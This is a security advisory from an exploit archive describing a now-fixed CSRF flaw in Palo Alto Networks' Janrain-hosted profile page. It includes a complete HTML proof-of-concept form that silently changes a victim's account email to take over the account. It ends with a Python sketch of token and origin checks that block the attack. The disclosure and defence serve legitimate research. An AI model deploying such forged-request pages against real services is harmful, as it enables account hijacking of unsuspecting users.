Palo Alto Networks Cross Site Request Forgery

2019.09.22
Credit: Pankaj Thakur
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

** Note: this vulnerability has already been fixed by the Palo Alto security team.

# Exploit Title: Missing CSRF token leads to full account takeover (all accounts can be hijacked)
# Google Dork: [N/A]
# Date: [Jul 23 2019]
# Exploit Author: Pankaj Kumar Thakur (Nepal) @Nep_1337_1998
# Vendor Homepage: https://www.paloaltonetworks.com
# Software Link: N/A
# Version: [8.0]
# Tested on: [Parrot OS]
# CVE: [N/A]
# Acknowledgement: https://www.paloaltonetworks.com/security-researcher-acknowledgement

Summary
----------
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.

Steps to reproduce
----------------------
>> Initially the account should be authenticated.
>> For testing purposes I changed the email address, and the account was fully taken over.

If the HTML file does not work, follow these steps:
>> Go to profile settings.
>> Change your profile details.
>> Then intercept that request.
>> Then generate a CSRF PoC and try it in the browser... boom! The account credentials will be changed.
PoC
---
<html>
  <!-- CSRF PoC -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://paloaltonetworks.us.janraincapture.com/widget/profile.jsonp" method="POST">
      <input type="hidden" name="utf8" value="&#10003;" />
      <input type="hidden" name="access_token" value="m5xw97v7uy63yqw7" />
      <input type="hidden" name="capture_screen" value="editProfile" />
      <input type="hidden" name="js_version" value="d445bf4" />
      <input type="hidden" name="capture_transactionId" value="e3x68i8s4lth5131z1az1zv8nvj4s4laygi5o3m0" />
      <input type="hidden" name="form" value="editProfileForm" />
      <input type="hidden" name="flow" value="customstandardflow" />
      <input type="hidden" name="client_id" value="tcdjg4vtnnbm88w8g72x2ajxvxnb4rmm" />
      <input type="hidden" name="redirect_uri" value="http://localhost/" />
      <input type="hidden" name="response_type" value="token" />
      <input type="hidden" name="flow_version" value="20190502085125375950" />
      <input type="hidden" name="settings_version" value="" />
      <input type="hidden" name="locale" value="en-US" />
      <input type="hidden" name="recaptchaVersion" value="2" />
      <input type="hidden" name="Salutation" value="" />
      <input type="hidden" name="First_Name__c" value="EMAIL_HIJACKED" />
      <input type="hidden" name="Middle_Name__c" value="" />
      <input type="hidden" name="Last_Name__c" value="test" />
      <input type="hidden" name="suffix" value="" />
      <input type="hidden" name="Email_Display_Name" value="hpankajjj" />
      <input type="hidden" name="Business_Email" value="pankajTESTHIJACKED@yopmail.com" />
      <input type="hidden" name="Personal_Email" value="" />
      <input type="hidden" name="Business_Phone" value="9999999999" />
      <input type="hidden" name="MobilePhone" value="" />
      <input type="hidden" name="Company" value="AbeBooks" />
      <input type="hidden" name="Title" value="" />
      <input type="hidden" name="Job_Role__c" value="Administrator" />
      <input type="hidden" name="Job_Level__c" value="" />
      <input type="hidden" name="Address1" value="" />
      <input type="hidden" name="Address2" value="" />
      <input type="hidden" name="City" value="" />
      <input type="hidden" name="Zip_or_Postal_Code" value="" />
      <input type="hidden" name="Country" value="India" />
      <input type="hidden" name="Alt_State_Province__c" value="" />
      <input type="hidden" name="province" value="" />
      <input type="hidden" name="Preferred_Communication" value="" />
      <input type="hidden" name="language__c" value="en_US" />
      <input type="hidden" name="location__c" value="India" />
      <input type="hidden" name="BreachPrevention_hidden" value="" />
      <input type="hidden" name="BYOD_hidden" value="" />
      <input type="hidden" name="CloudSecurity_hidden" value="" />
      <input type="hidden" name="Cybersecurity_hidden" value="" />
      <input type="hidden" name="DataCenterVirtualization_hidden" value="" />
      <input type="hidden" name="EndpointSecurity_hidden" value="" />
      <input type="hidden" name="Firewalls_hidden" value="" />
      <input type="hidden" name="Mobility_hidden" value="" />
      <input type="hidden" name="NetworkSecurity_hidden" value="" />
      <input type="hidden" name="NetworkPerimeter_hidden" value="" />
      <input type="hidden" name="NextGenerationFirewall_hidden" value="" />
      <input type="hidden" name="SaaSSecurity_hidden" value="" />
      <input type="hidden" name="ThreatPrevention_hidden" value="" />
      <input type="hidden" name="subscribeToNewsAndProductUpdates_hidden" value="" />
      <input type="hidden" name="subscribeToEventsAndWebinars_hidden" value="" />
      <input type="hidden" name="subscribeToUnit42ThreatResearch_hidden" value="" />
      <input type="hidden" name="tab1complete__c" value="true" />
      <input type="hidden" name="tab2complete__c" value="false" />
      <input type="hidden" name="tab3complete__c" value="false" />
      <input type="hidden" name="tab4complete__c" value="false" />
      <input type="hidden" name="tab5complete__c" value="false" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Thank you,
Pankaj Kumar Thakur
Indp. Security Researcher | Certified Ethical Hacker | Red Team at SYNACK Inc | OSCP
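A server-side check that would have rejected the forged post above, added here as an illustration and not code from Palo Alto Networks or the Janrain widget: a session-bound synchronizer token plus an Origin/Referer check in front of the profile-update handler. The endpoint path, the trusted origin and the Business_Email field come from the PoC; the session cookie name, the secret handling and all function names are assumptions.

```python
import hmac
import hashlib
import secrets
from urllib.parse import urlparse

# Constructed per-deployment secret; a real server keeps this in its key store.
SERVER_SECRET = secrets.token_bytes(32)
# Origin of the legitimate profile widget (host taken from the PoC's form action).
ALLOWED_ORIGINS = {"https://paloaltonetworks.us.janraincapture.com"}


def issue_csrf_token(session_id):
    """Synchronizer token bound to the session: nonce + HMAC(secret, session_id:nonce).
    The server embeds it in the editProfile form; an attacker's page cannot read it."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    """Recompute the MAC for this session and compare in constant time."""
    try:
        nonce, mac = token.split(".", 1)
    except (ValueError, AttributeError):  # missing, malformed or non-string token
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac.encode(), expected.encode())


def origin_allowed(headers):
    """Defence in depth: a browser-submitted cross-site form POST carries the
    attacker page's Origin, so it can be refused before the token is even checked."""
    origin = headers.get("Origin")
    if origin is None and "Referer" in headers:
        ref = urlparse(headers["Referer"])
        origin = f"{ref.scheme}://{ref.netloc}"
    return origin in ALLOWED_ORIGINS


def handle_profile_update(headers, cookies, form):
    """POST /widget/profile.jsonp -> (status, message). The advisory's PoC only
    succeeds against an endpoint that performs neither of the two 403 checks."""
    session_id = cookies.get("session")  # assumed session cookie name
    if not session_id:
        return 401, "not authenticated"
    if not origin_allowed(headers):
        return 403, "cross-site origin rejected"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 200, f"profile updated, Business_Email={form.get('Business_Email')}"
```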


Copyright 2024, cxsecurity.com